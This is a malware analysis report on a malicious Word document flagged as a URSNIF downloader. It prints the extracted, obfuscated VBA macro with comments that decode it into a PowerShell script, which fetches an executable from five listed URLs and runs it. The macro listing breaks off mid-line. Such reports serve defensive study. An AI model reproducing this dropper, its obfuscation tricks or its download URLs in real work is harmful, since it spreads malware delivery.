Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcbc0cd6cdbba896…

MALICIOUS

Office (OLE)

61.1 KB Created: 2018-09-06 14:16:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 8a1416f4261015e9e4437c91b605f882 SHA-1: 5bbd2c01917cb64f610bc347a84114443e8b5dcf SHA-256: bcbc0cd6cdbba896384d2c13a3e9697b1e22261d44758632cbb0a389792ea1cd
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Word document whose VBA project auto-runs when it is opened: the `Document_open` handler in the ThisDocument module calls `Shell(...)` with `vbHide`, so the launched command has no visible window. The command line is assembled from string fragments returned by several helper functions. The fragments are caret-escaped (`^` is cmd.exe's escape character and is dropped when the line is parsed) and most of them are stored back-to-front; decoded, they yield a `cmd /V:ON /C "set FdH=<reversed script> ...` wrapper whose script is PowerShell of the form `new-object Net.WebClient ... DownloadFile ... Invoke-Item`: it walks an `'@'`-separated list of five `http://` URLs, saves the first successful download as `$env:public\735.exe` and executes it. Junk `Month "..."` calls interleaved with the real statements raise type-mismatch errors that a line-continued `On Error Resume Next` silences. The ClamAV signature `Doc.Downloader.URSNIF-6729855-3` labels the document a downloader, and the decoded macro confirms download-and-execute behaviour directly; the family attribution itself rests on the ClamAV name alone, since the second-stage payload is not contained in the sample. The download URLs live only inside the macro's string concatenation, so they are not surfaced by the embedded-URL heuristic below — an analyst must take them from the decoded macro.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the OOXML DrawingML namespace URI that ordinary Word documents carry; it is a format artefact, not a network indicator, and should not be treated as a download or C2 address. The URLs this sample actually contacts are built at runtime from reversed string fragments inside the macro and therefore do not appear in this list; see the decoded macro below.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4983 bytes
SHA-256: f693e36e4f41b2acd6ce31ecc79a3d711780060c58b49575dde7ceffd0d0c2c5
Preview script
First 1,000 lines of the extracted script
' Module header as emitted by olevba. VB_Base = "1Normal.ThisDocument" marks
' this as the document's own class module (ThisDocument), which is why the
' Document_open handler that follows is wired to the document itself.
' The module name, like every identifier in the decoded source, is a
' random-looking string — consistent with a generated, obfuscated macro.
Attribute VB_Name = "QUnktJjln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word fires Document_open when the document is opened
' (once macros are enabled), so no further user interaction is needed.
Private Sub Document_open()
' "On Error Resume Next" split across four line-continued lines. It is the
' ordinary statement, written so that a single-line pattern match does not
' see it; it also silences the type-mismatch errors raised by the junk
' Month calls in the helper functions.
On _
Error _
Resume _
Next
' The command line is the concatenation of seven helper results, run with
' the window hidden (vbHide). Only ZdCPiOUZh and UhkpqBCO are visible in
' this excerpt; waNduAX, znFsvREjii, WzdlNlnE, RcTPzdwwBEhWvZ and SqQYUHS
' are defined elsewhere in the macro. ZdCPiOUZh contributes the
' cmd /V:ON/C"set FdH=<reversed text> prefix, so the pieces before it are
' presumably empty or whitespace — TODO confirm against the full dump.
' (If waNduAX is an undeclared variable rather than a function, Format()
' of Empty yields "" — cannot tell from here.)
Shell Format(waNduAX) + znFsvREjii + WzdlNlnE + ZdCPiOUZh + UhkpqBCO + RcTPzdwwBEhWvZ + SqQYUHS, vbHide
End Sub



' Second module of the VBA project. It has no VB_Base attribute, so it is
' presumably a standard code module; it holds the string-builder helpers
' whose return values Document_open concatenates into the Shell command.
Attribute VB_Name = "bakrjOjTKBW"
' Returns one segment of the Shell command line: the concatenation of the
' twelve string variables assigned below. Everything else in the body is
' noise whose result is discarded.
'
' Decoding notes (worked by hand from the literals below):
'   Chr(18 + 0 + 10 + 17 + 54) = Chr(99) = "c"
'   Chr(12 + 0 + 7 + 11 + 37)  = Chr(67) = "C"
'   Chr(5 + 0 + 3 + 5 + 21)    = Chr(34) = "  (a double quote)
' "^" is cmd.exe's escape character and is removed when cmd parses the
' line, so the carets only serve to break up signatures. With carets
' stripped, the first fragment reads  cmd /V:ON/C"set FdH=  followed by a
' run of spaces and a closing brace; /V:ON enables delayed variable
' expansion, which the rest of the command line (presumably built by the
' helpers not shown here) uses to read the FdH variable back reversed.
' Every later fragment is PowerShell stored back-to-front. Read from the
' last fragment to the first, each reversed, they form:
'   ...bClient;$zwW='http://icexpert.net/l@http://gastvrijnoordholland.nl/W4fq@
'   http://ealinks.com/gg6E@http://artopiastudiosinc.com/Ksc@
'   http://envieiparis.com/imP'.Split('@');$fFt = '735';
'   $luc=$env:public+'\'+$fFt+'.exe';foreach($XcK in $zwW){try{
'   $GmQ.DownloadFile($XcK, $luc);Invoke-Item $luc;break;}catch{}}
' i.e. try five URLs in turn, save the first successful download as
' %PUBLIC%\735.exe and execute it. The "w-object Net.We" fragment in
' UhkpqBCO (wlddbfYUXt) appears to supply the start of this script
' (new-object Net.WebClient) — confirm against the full dump.
Function ZdCPiOUZh()

' Same line-continued "On Error Resume Next" as in Document_open; it
' swallows the errors raised by the Month calls below.
On _
Error _
Resume _
Next
' Month() is called as a statement on concatenated strings that are not
' dates. The results are never used (the function returns only the
' concatenation at the end), so these interleaved calls are junk code.
Month "jzTRtsiMSF" + "1709"
   Month "4469" + "MYBErR" + "EnQYSOza" + "82242409"
   Month "KjiC" + "5275" + "C" + "a"
   Month "9602" + "11996652"
' Carets stripped:  cmd /V:ON/C"set FdH=                 }
' (the spaces and brace are the tail end of the reversed script).
ELacoKUEbW = Chr(18 + 0 + 10 + 17 + 54) + "md /" + "V" + "^:^O" + "N/" + Chr(12 + 0 + 7 + 11 + 37) + Chr(5 + 0 + 3 + 5 + 21) + "^s^et ^" + "F^dH=^ " + "^  ^  " + "^    " + "^    ^ " + "^   ^}"
Month "39729721" + "AD" + "341231865" + "p"
   Month "vQaB" + "t" + "oI" + "Linwjqa"
   Month "EtNpLiIi" + "8281" + "MDEU" + "c"
   Month "zrk" + "E"
' Reversed:  uc);Invoke-Item $luc;break;}catch{}
ddTNs = "}{" + "^h" + Chr(18 + 0 + 10 + 17 + 54) + "^ta" + Chr(18 + 0 + 10 + 17 + 54) + "}^;k" + "^aerb;" + Chr(18 + 0 + 10 + 17 + 54) + "u" + "l$ " + "^m^e" + "^tI^-e" + "k^ov" + "nI" + ";)" + Chr(18 + 0 + 10 + 17 + 54) + "^u"
Month "205" + "cFkZYvVJjp"
   Month "JcaC" + "211830277"
   Month "20" + "VpAZETYS"
   Month "9275" + "3648" + "LEVuSQwwH" + "482155827"
' Reversed:  adFile($XcK, $l
YdSDLh = "l$^ ^," + "K" + Chr(18 + 0 + 10 + 17 + 54) + "X^" + "$(" + "^" + "e^liF^d" + "a"
Month "G" + "iCXSoqvav" + "200890854" + "w"
   Month "5036" + "wCfuG"
   Month "133871181" + "O"
' Reversed:  each($XcK in $zwW){try{$GmQ.Downlo
zMbTJE = "^" + "oln" + "^w^o" + "^D" + "^.^G^mQ" + "^${^yr" + "^t{)W^w" + "z$^ ni " + "K" + Chr(18 + 0 + 10 + 17 + 54) + "^X^$" + "(^h" + Chr(18 + 0 + 10 + 17 + 54) + "ae"
Month "16665454" + "mTdZoM"
' Reversed:  '\'+$fFt+'.exe';for
SmZzH = "r^of;" + "^'" + "exe^" + ".'^+" + "^t^F" + "^f$" + "^+'\^'"
Month "ZorQ" + "229732073"
   Month "utzdsF" + "183023252" + "Mldt" + "B"
   Month "sMDiwAQL" + "NaTWM" + "SjKD" + "7193"
' Reversed:  '735';$luc=$env:public+
krFTwOdcj = "^+" + Chr(18 + 0 + 10 + 17 + 54) + "i" + "lb^u" + "^p:vne" + "^$=" + Chr(18 + 0 + 10 + 17 + 54) + "u^l" + "^$;'" + "^537^'^"
Month "1248" + "9968"
   Month "619" + "HoOQHfHFCw"
' Reversed:  s.com/imP'.Split('@');$fFt =
ddlfSWfj = " ^= ^t" + "F^f" + "$" + ";)" + "'^@" + "'(" + "^t^i^l" + "^pS^.^" + "'Pmi/m" + "o" + Chr(18 + 0 + 10 + 17 + 54) + ".s"
Month "LN" + "SW" + "YjhO" + "123700984"
' Reversed:  osinc.com/Ksc@http://envieipari
GBnwjjbW = "^ira^p" + "^e^i" + "vn^e/" + "/:" + "^p^t" + "th@" + Chr(18 + 0 + 10 + 17 + 54) + "s^" + "K/mo" + Chr(18 + 0 + 10 + 17 + 54) + "." + Chr(18 + 0 + 10 + 17 + 54) + "n" + "is^o" + "^"
Month "hCCb" + "2118"
   Month "mt" + "tPNtO"
   Month "ppH" + "R"
' Reversed:  ptt://artopiastudi   (the leading "h" of http is the last
' character of the next fragment)
wrTpCwwq = "i^d" + "^uts^a" + "^i^po^t" + "r" + "a//" + "^:ptt"
Month "z" + "181221366"
   Month "jsRL" + "1079"
' Reversed:  http://ealinks.com/gg6E@h
naoAu = "^" + "h@E" + "6g^g/" + "^mo" + Chr(18 + 0 + 10 + 17 + 54) + "^.^" + "s^" + "kn^i^l" + "ea//^" + ":^p" + "t^t^h"
Month "21703089" + "RQuwYV" + "1901" + "7011"
   Month "JKSYT" + "KvCMSv" + "djzqsQ" + "IU"
   Month "2124017" + "317619582" + "6528" + "ILdrHfiInwnG"
' Reversed:  t/l@http://gastvrijnoordholland.nl/W4fq@
VBRSzSJRw = "@q^f^" + "4^W/ln" + "^.dn" + "al^l^" + "oh^dr" + "o^onj" + "irv^t^" + "sag//:" + "pt^t^" + "h@^l/^t"
Month "ljPUBaCVtGk" + "ACzjNI"
   Month "LLBbqHv" + "361541911" + "8487" + "ZOpqbmhwubBl"
' Reversed:  bClient;$zwW='http://icexpert.ne
AaBjuL = "en^.tr" + "e" + "p^" + "x^e" + Chr(18 + 0 + 10 + 17 + 54) + "^" + "i//^:" + "pt^t" + "^h^" + "'=W" + "wz$^" + ";" + "tn^" + "eil" + Chr(12 + 0 + 7 + 11 + 37) + "^b^"
' The only statement that matters: the fragments are joined in source
' order and returned as the function's value.
ZdCPiOUZh = ELacoKUEbW + ddTNs + YdSDLh + zMbTJE + SmZzH + krFTwOdcj + ddlfSWfj + GBnwjjbW + wrTpCwwq + naoAu + VBRSzSJRw + AaBjuL
   Month "472778122" + "XwTqq" + "rv" + "CRZ"
   Month "dtfMviQuCNU" + "llGfJmkdf"
   Month "5213" + "489661767"
End Function
Function UhkpqBCO()

On _
Error _
Resume _
Next
Month "Wi" + "coJMHT" + "z" + "GD"
   Month "BIGc" + "328"
   Month "8588" + "GBQc" + "7587" + "UGKGWI"
wlddbfYUXt = "eW^.t^e" + "N t" + Chr(18 + 0 + 10 + 17 + 54) + "e" + "j" + "^b^o" + "^" + "-w^"
Month "VIwBiCif" + "npol" + "R" + "rbwOhzR"
   Month "LoF" + "BNfiozZG" + "395872541" + "1327"
   Month "sDFhkMbN" + "n" + "9789" + "Vzu"
   Month "Pk" + "vWb
... (truncated)